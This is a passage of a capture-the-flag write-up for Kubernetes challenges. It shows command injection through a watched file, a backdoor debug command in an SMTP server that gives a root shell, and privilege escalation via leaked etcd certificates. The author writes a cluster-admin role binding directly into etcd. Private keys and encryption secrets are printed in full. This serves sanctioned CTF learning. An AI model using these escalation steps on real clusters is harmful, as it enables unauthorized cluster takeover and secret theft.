/var/.hidden # ^[[56;16Recho id > whats-weird-about-this-file.tar
echo id > whats-weird-about-this-file.tar
(tail -f)
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
Excellent. Let’s see what we can find.
(sender)
/var/.hidden # ^[[56;16Recho ls > whats-weird-about-this-file.tar
echo ls > whats-weird-about-this-file.tar
/var/.hidden # ^[[56;16Recho cat flag.txt > whats-weird-about-this-file.tar
echo cat flag.txt > whats-weird-about-this-file.tar
(tail -f)
bin
dev
etc
flag.txt
home
lib
media
mnt
opt
proc
product_name
product_uuid
root
run
sbin
sidecar.py
srv
sys
tmp
usr
var
{flag-a-pods-ctrs-share-ipc-and-net-ns-did-you-find-dev-shm}
Nice.
Challenge 6 - wizards-communicate by Jay Beale
This is a challenge I did not manage to complete during the CTF itself. However, after a hint from one of the organisers after, I got it.
Wizards of DEF CON, please kubectl exec into entry-pod in the wizards-communicate namespace.
Same as before, we end up in entry-pod
. I do a lot of enumeration and barely find anything.
One thing of note I did find through nmap
is an SMTP server running on the IP address one above the pod. However, I have little information about it, I do attempt to play with it a bit but nothing springs out.
After the CTF completes, one of the organisers informs me about this vulnerability, and that there should have been a hint to that within the pod. This vulnerability talks about a debug command that allows for remote code execution.
Using this new-found information, we can quickly get the flag.
/ # nc 192.168.24.194 25
220 example.com ESMTP Sendmail
EHLO test
220 example.com ESMTP Sendmail
WIZ
250 OK
Who are you that asks to see the Great and Powerful Oz?
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
ls -lp
total 3464
drwxr-xr-x 2 root root 4096 Jan 26 2024 bin/
drwxr-xr-x 5 root root 360 Aug 9 22:37 dev/
drwxr-xr-x 1 root root 4096 Aug 9 22:37 etc/
drwxrwxrwt 3 root root 100 Aug 9 22:37 flag/
drwxr-xr-x 2 root root 4096 Jan 26 2024 home/
drwxr-xr-x 7 root root 4096 Jan 26 2024 lib/
drwxr-xr-x 5 root root 4096 Jan 26 2024 media/
drwxr-xr-x 2 root root 4096 Jan 26 2024 mnt/
drwxr-xr-x 2 root root 4096 Jan 26 2024 opt/
dr-xr-xr-x 578 root root 0 Aug 9 22:37 proc/
-rw-r--r-- 1 root root 5 Aug 9 22:37 product_name
-rw-r--r-- 1 root root 37 Aug 9 22:37 product_uuid
drwx------ 2 root root 4096 Jan 26 2024 root/
drwxr-xr-x 1 root root 4096 Aug 9 22:37 run/
drwxr-xr-x 2 root root 4096 Jan 26 2024 sbin/
drwxr-xr-x 2 root root 4096 Jan 26 2024 srv/
dr-xr-xr-x 13 root root 0 Aug 9 22:37 sys/
drwxrwxrwt 2 root root 4096 Jan 26 2024 tmp/
drwxr-xr-x 7 root root 4096 Jan 26 2024 usr/
drwxr-xr-x 12 root root 4096 Jan 26 2024 var/
-rwxr-xr-x 1 root root 3481538 Jul 12 20:44 wiz-mail-server
cd flag
exec: "cd": executable file not found in $PATH
ls -l flag/
total 0
lrwxrwxrwx 1 root root 11 Aug 9 22:37 flag -> ..data/flag
cat flag/flag
{flag-dj-cmos-ftw}
Challenge 7 - loworbit-kubernoodels
We played around with etcd encryption.
I solved this in an unintended way. I could see what the intended solution path was, but thought that was too much effort and so did it in a slightly different way.
Starting off - permissions.
$ k auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
bindings [] [] [get list watch]
configmaps [] [] [get list watch]
endpoints [] [] [get list watch]
events [] [] [get list watch]
limitranges [] [] [get list watch]
namespaces/status [] [] [get list watch]
namespaces [] [] [get list watch]
persistentvolumeclaims/status [] [] [get list watch]
persistentvolumeclaims [] [] [get list watch]
pods/log [] [] [get list watch]
pods/status [] [] [get list watch]
pods [] [] [get list watch]
replicationcontrollers/scale [] [] [get list watch]
replicationcontrollers/status [] [] [get list watch]
replicationcontrollers [] [] [get list watch]
resourcequotas/status [] [] [get list watch]
resourcequotas [] [] [get list watch]
serviceaccounts [] [] [get list watch]
services/status [] [] [get list watch]
services [] [] [get list watch]
controllerrevisions.apps [] [] [get list watch]
daemonsets.apps/status [] [] [get list watch]
daemonsets.apps [] [] [get list watch]
deployments.apps/scale [] [] [get list watch]
deployments.apps/status [] [] [get list watch]
deployments.apps [] [] [get list watch]
replicasets.apps/scale [] [] [get list watch]
replicasets.apps/status [] [] [get list watch]
replicasets.apps [] [] [get list watch]
statefulsets.apps/scale [] [] [get list watch]
statefulsets.apps/status [] [] [get list watch]
statefulsets.apps [] [] [get list watch]
horizontalpodautoscalers.autoscaling/status [] [] [get list watch]
horizontalpodautoscalers.autoscaling [] [] [get list watch]
cronjobs.batch/status [] [] [get list watch]
cronjobs.batch [] [] [get list watch]
jobs.batch/status [] [] [get list watch]
jobs.batch [] [] [get list watch]
endpointslices.discovery.k8s.io [] [] [get list watch]
daemonsets.extensions/status [] [] [get list watch]
daemonsets.extensions [] [] [get list watch]
deployments.extensions/scale [] [] [get list watch]
deployments.extensions/status [] [] [get list watch]
deployments.extensions [] [] [get list watch]
ingresses.extensions/status [] [] [get list watch]
ingresses.extensions [] [] [get list watch]
networkpolicies.extensions [] [] [get list watch]
replicasets.extensions/scale [] [] [get list watch]
replicasets.extensions/status [] [] [get list watch]
replicasets.extensions [] [] [get list watch]
replicationcontrollers.extensions/scale [] [] [get list watch]
ingresses.networking.k8s.io/status [] [] [get list watch]
ingresses.networking.k8s.io [] [] [get list watch]
networkpolicies.networking.k8s.io [] [] [get list watch]
poddisruptionbudgets.policy/status [] [] [get list watch]
poddisruptionbudgets.policy [] [] [get list watch]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
OK, we have access to a lot. Going through a few things, we find a treasure trove in the configmaps.
$ k get -A cm
NAMESPACE NAME DATA AGE
cilium-secrets kube-root-ca.crt 1 11h
default kube-root-ca.crt 1 11h
kube-node-lease kube-root-ca.crt 1 11h
kube-public cluster-info 2 11h
kube-public kube-root-ca.crt 1 11h
kube-system cilium-config 144 11h
kube-system cilium-envoy-config 1 11h
kube-system coredns 1 11h
kube-system encryption-config 1 11h
kube-system etcd-cert 3 11h
kube-system extension-apiserver-authentication 6 11h
kube-system kube-apiserver-legacy-service-account-token-tracking 1 11h
kube-system kube-proxy 2 11h
kube-system kube-root-ca.crt 1 11h
kube-system kubeadm-config 1 11h
kube-system kubelet-config 1 11h
Based of the description, I guess we are interacting with etcd
. So let’s enumerate what we can about that.
$ k get -n kube-system cm etcd-cert -o yaml
apiVersion: v1
data:
ca.crt: |
-----BEGIN CERTIFICATE-----
MIIC/DCCAeSgAwIBAgIICiQDbEaGVKIwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
AxMHZXRjZC1jYTAeFw0yNTA4MDkxNTEzMTNaFw0zNTA4MDcxNTE4MTNaMBIxEDAO
BgNVBAMTB2V0Y2QtY2EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCu
TFjdD968RunH+BM0FWWoKpXJyv+LzhVB3DR9kgJbtv4SxekPVKRyrCZVuPtCVS4t
itA+ly9PEZQFK6mMS6r/T1dVbOjB9E22TomXe8e/IpUimajwKJmhWQIM8LcfKvfq
W8rVJP0oq7mtTikd4RJHnicUbvmek8zIcHZaSyhCsJ4BKF+SnimOsfC/PqiFMcX/
zl8CJXpW3Z9gm7b0CY0H56yiiGsLk/ZGhdL1f/5huN5xaTDhbFa1GQYqxsq0bx+C
6mY721kKvXya8VNk22lqAJrFBetGf5uw7bDQHu/eHe70wmRWH7nbfDH83hmTZJcJ
4/wm9sPRzJ4Y391XLkPBAgMBAAGjVjBUMA4GA1UdDwEB/wQEAwICpDAPBgNVHRMB
Af8EBTADAQH/MB0GA1UdDgQWBBSY5vgkIFVpAZIC6XcISM3wt49vFjASBgNVHREE
CzAJggdldGNkLWNhMA0GCSqGSIb3DQEBCwUAA4IBAQBnqqOnHg6kan8Qz70/akGl
8iR4XKIHHXvRXlNKgKf15iTYCCqGGo/HnMshnKd2CTzOdwcEASGJL6xsL0l41Avt
L/81PeP6CemZard1A1TLy9oIV/IanGim7INSyoL7Xy3dw7FcqClqsxFoKY05lZ70
jG/rGi8+aba3xOvm4lXYJ3JPdrRPArt8ITcJXbriJjYRKXYAprUjKYUcubPFLpBw
bzuU8bIW5HKf7tolXTAY2F7BGZNtIij2aeY8YZNOVcvA6T6VwvTEjJprOv/HQfNX
0WV6Ac2iF+pea8qGyP2u+nXfa1xgYQmxpqMQjY1zIIoatGCjgljlcdkEEoOsxiPG
-----END CERTIFICATE-----
server.crt: |
-----BEGIN CERTIFICATE-----
MIIDTzCCAjegAwIBAgIILcJhDUdwmjgwDQYJKoZIhvcNAQELBQAwEjEQMA4GA1UE
AxMHZXRjZC1jYTAeFw0yNTA4MDkxNTEzMTNaFw0yNjA4MDkxNTE4MTNaMBcxFTAT
BgNVBAMTDGt1YmVybm9vZGVsczCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC
ggEBAN2Dh9jUfx4n3v4hYGZkC3bKAs7obQ57cq8J04xBEM+N/cRq/vpgGKVeIajN
qYb6fxx9ihqdRGityTChB4EwMIOjytr+/DKL3tz/QJ+QDuUa2EErQ3ySe+NvOOw9
l51TslOOhTev5EsHaTzPnaswNChPtiir3ZOTppTR7Q3hKRjZ80K2gx4tv3ynkgRv
mmDcdXNx83Bm9NMtcIhW8m9jzRdNDHysDGIGriU//aCM5z9kRJs5frpchWckiW2x
CgjNWrA+0K2c+vGeCXr9ZJwQGzTJiLrGxObOYTknTB9KhOEuhRE6UXEJEIrtjEsX
SxuYYsse/RHHzsFG6xAT3xqDbb8CAwEAAaOBozCBoDAOBgNVHQ8BAf8EBAMCBaAw
HQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHwYD
VR0jBBgwFoAUmOb4JCBVaQGSAul3CEjN8LePbxYwQAYDVR0RBDkwN4IMa3ViZXJu
b29kZWxzgglsb2NhbGhvc3SHBCUbu26HBH8AAAGHEAAAAAAAAAAAAAAAAAAAAAEw
DQYJKoZIhvcNAQELBQADggEBAEdmUDF1d2FZmvZ121lAzOOVOFPBPd/Iqx0mVV6w
QS5QsQLK4lQNhtAiEn61lWBL2fIc2urRDuqQ479+rzC/aR2DwqbXZXfiQ0FcWggv
kTUvkH1ZVBc/wAE12VpgrAqjzglzpwJxHqu92gYsweLSZpgasSLUxy0h3oGtTato
qeyvdINpg2dpJcFXIflROsKqfuaa/57kKWnl+oB0RNL7qURvuMbcd1GTKhjYDEhr
Gr9U1XWFpBY5YTBVoYPhKr+n+QbU6bamQ4Jc1MAxy9Ok+AVokbD19Or3/V6+Ea5R
QV7ahmJ0rvnQiT3BOxJGCOARBRzqB38hPRfVZev1dQQLNNU=
-----END CERTIFICATE-----
server.key: |
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA3YOH2NR/Hife/iFgZmQLdsoCzuhtDntyrwnTjEEQz439xGr+
+mAYpV4hqM2phvp/HH2KGp1EaK3JMKEHgTAwg6PK2v78Move3P9An5AO5RrYQStD
fJJ742847D2XnVOyU46FN6/kSwdpPM+dqzA0KE+2KKvdk5OmlNHtDeEpGNnzQraD
Hi2/fKeSBG+aYNx1c3HzcGb00y1wiFbyb2PNF00MfKwMYgauJT/9oIznP2REmzl+
ulyFZySJbbEKCM1asD7QrZz68Z4Jev1knBAbNMmIusbE5s5hOSdMH0qE4S6FETpR
cQkQiu2MSxdLG5hiyx79EcfOwUbrEBPfGoNtvwIDAQABAoIBAQCelrSDgF8h79mu
h6bEp4utmCM6jxzE6YzJ1HcoSs0GS9oK7a9vAa2jdykR+WwNvvmSJC7jrwRzDTil
ICSHUUDqfjGVaEiWx5zfC7/wfOqtC/MXdSnz3cvkoJRYTiBl+q4JNFgb7km7jarC
ZsGy9efhlHAN3j3ckjEJCuJ0tWb+6nZLb8BJ/49Onqib3HOWZCAQRP1mYAAlV3PN
8BrPCCRq9B9yoORdZ0SxXXmkqtcd8PHX335T01Ogu0rfaBGapJs4FniRCQrayi1F
h+fgp0VhJDxPMIQwqCcQ+J3QAhs2LMWtRVOP2V02Yd7mN/OWWB5xl5o+iij9hQps
nUxkMGpBAoGBAO7gDliRiaxMaHRfnKiQLrTnangBAIi178f61qdAkTwQ1tklk7qB
bFOObrd7bwe/imFS99Mo1goA0jz70s0IcK+J1VYNG2hYpTnbQhcXkgb2S/5ViFHz
ZeinvQP69XrY2N7/xgFx8/5bKRFBoPjAnLS6RaupCo4fE+9Wgup0oZNlAoGBAO1k
2ZmVEOJa/WKNLrKCSX/V5iWwzNSUiP1rkJISvYJMeKzoqWnv52HrLb/TeBMLWiw3
AgpEppxJ6XpvlRPTady1nUlZp8mpUBCIAIs73Zfi8ztJBUAuT2sH4TALXZOn08XK
KNbXxYPvyI4GEFkshUdDffveIWKjQelW9xaZPdRTAoGBAKyk1vmARmZ22s+xAsJ5
Yqhw0OxmnQIxrFl2m4lKCy3EZeOPWxPi0m4ZdT+7QGXzM4pfsqm0y+1y5oAY6SQy
w267Sarl0jc6SkBkjYGvEWViwU3Sd7HzHmZmRSAJUz40V5nkdjE5MMVXEXldW4At
hZTBQ/VrOSu6nmfOuNPG87hZAoGANNeKCEHCLGCMnm9Gwb12ltoKDMG6Fmepxp82
4w0A2gwjoHl5nHcmTgmHeXec9sBEJitobNizLX7WVcaYrH0Wx2Y1yKoISz9A7y0W
0edVgAWolr2+SXcFfpGWcpdVERT+crx5Mrl84c1yGwsGgJMEZ8SCOppLXCVy+nm9
Lm6V8LkCgYBylpu4cNp67GKC2iURMd3tQGoDZ1JxnKdv7xpSmSMb7KI5Bae5NPoL
WEykLrrkFJeJd7wSZz0eKLYHDJbOrqIaNTkTEMsGfEM95m4aZA6xBIzuoSttKbFT
Goyx3d2E0hJLGjrUu5/364a2M8R02GtWBu0MRv1nGFWsF0yRZinjCA==
-----END RSA PRIVATE KEY-----
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-09T15:27:05Z"
name: etcd-cert
namespace: kube-system
resourceVersion: "1075"
uid: 72d97c28-a07c-4e1d-b53d-117a7bccc16e
Nice, let’s save those.
$ k -n kube-system get cm encryption-config -o yaml
apiVersion: v1
data:
enc.yaml: |
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
providers:
- aescbc:
keys:
- name: key1
secret: Vcu5Q9tb3pUyahrTtXuIkT7i2deVdw9ITbsoGTYPGgI=
- aesgcm:
keys:
- name: key1
secret: Gj1Ra2YZjVcFVl1QUXxtD6W5zJHU8H/X5kVtBzL+dC0=
- name: key2
secret: RA52KOYk4ZdAWM3JAqKoFksrtBXI3nnlpAPISWFqrPQ=
kind: ConfigMap
metadata:
creationTimestamp: "2025-08-09T15:19:06Z"
name: encryption-config
namespace: kube-system
resourceVersion: "403"
uid: 07462686-875d-45db-abb5-ae78f11ea9b3
OK, and secrets are encrypted. One of the things I had noticed earlier was that a pod had the flag mounted in from a secret.
$ k -n default get pods -o yaml
apiVersion: v1
items:
- apiVersion: v1
kind: Pod
metadata:
annotations:
kubectl.kubernetes.io/last-applied-configuration: |
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{},"name":"flag-reader","namespace":"default"},"spec":{"containers":[{"command":["sleep","3600"],"image":"alpine:3.20","name":"alpine","volumeMounts":[{"mountPath":"/etc/flag","name":"flag-volume","readOnly":true}]}],"volumes":[{"name":"flag-volume","secret":{"secretName":"flag"}}]}}
creationTimestamp: "2025-08-09T16:53:39Z"
name: flag-reader
namespace: default
resourceVersion: "7495"
uid: 4628bdcd-c9f1-4308-baa8-c10dcb68ae5c
spec:
[..SNIP..]
volumes:
- name: flag-volume
secret:
defaultMode: 420
secretName: flag
[..SNIP..]
So it looks like we need to connect to etcd and get the encrypted contents and then decrypt it with one of those keys.
That sounds like way too much effort.
etcd is the central key-value datastore for all of Kubernetes. We could also just make ourselves cluster-admin by uploading a new cluster role binding. A tool called auger is super useful for this.
Let us assume the IP of etcd is the same as the API server, they usually are. Which we can grab from the kubeconfig file.
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 get / --prefix --keys-only | grep secrets
/registry/configmaps/cilium-secrets/kube-root-ca.crt
/registry/namespaces/cilium-secrets
/registry/rolebindings/cilium-secrets/cilium-operator-tlsinterception-secrets
/registry/rolebindings/cilium-secrets/cilium-tlsinterception-secrets
/registry/roles/cilium-secrets/cilium-operator-tlsinterception-secrets
/registry/roles/cilium-secrets/cilium-tlsinterception-secrets
/registry/secrets/default/flag
/registry/secrets/kube-system/bootstrap-token-0h4sqi
/registry/secrets/kube-system/cilium-ca
/registry/secrets/kube-system/hubble-server-certs
/registry/secrets/kube-system/sh.helm.release.v1.cilium.v1
/registry/serviceaccounts/cilium-secrets/default
Nice, the certificates from the config map, and the IP are correct.
One thing to note, this is a shared cluster with all other participants. So I need to quickly add the permissions, get the secret and then delete the permissions.
Preparing a quick cluster role binding once we identify our service account.
$ k auth whoami
ATTRIBUTE VALUE
Username system:serviceaccount:kube-system:ctf-player
UID 68083112-cf00-4f59-b216-e209ca64e03e
Groups [system:serviceaccounts system:serviceaccounts:kube-system system:authenticated]
Extra: authentication.kubernetes.io/credential-id [JTI=2550e7f8-5018-441c-b729-dd04758c2772]
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: skybound
subjects:
- kind: ServiceAccount
name: ctf-player
namespace: kube-system
roleRef:
kind: ClusterRole
name: cluster-admin
apiGroup: rbac.authorization.k8s.io
Once it’s created, we can deploy it as follows:
$ cat binding.yml | auger encode | etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 put /registry/clusterrolebindings/skybound
OK
Now, let’s retrieve the flag and delete the permissions.
$ k -n default get secrets flag -o yaml
apiVersion: v1
data:
flag: e2ZsYWctb25lX29yZGVyX29mX2t1YmVybm9vZGxlc19wbHN9
kind: Secret
metadata:
creationTimestamp: "2025-08-09T16:30:11Z"
name: flag
namespace: default
resourceVersion: "5762"
uid: 95f68c50-1727-4cea-a6ff-4282da943a96
type: Opaque
$ base64 -d <<< e2ZsYWctb25lX29yZGVyX29mX2t1YmVybm9vZGxlc19wbHN9
{flag-one_order_of_kubernoodles_pls}
$ etcdctl --cacert=./ca.crt --cert=./server.crt --key=./server.key --endpoints=37.27.187.110:2379 del /registry/clusterrolebindings/skybound
1
$ k -n default get secrets flag -o yaml
Error from server (Forbidden): secrets "flag" is forbidden: User "system:serviceaccount:kube-system:ctf-player" cannot get resource "secrets" in API group "" in the namespace "default"
Excellent.
Conclusion
That was a fun CTF. There was a very good spread of Kubernetes concepts, some I don’t really see in CTFs. The IPC communication through named pipes for code execution was particularly unexpected. There was a slight issue with some of the challenges not having all the details needing to solve it off the bat. But the organisers were pretty quick to fix things when I raised it with them. Thank you to all the challenge creators and organisers of the CTF.
As always, here is the scoreboard.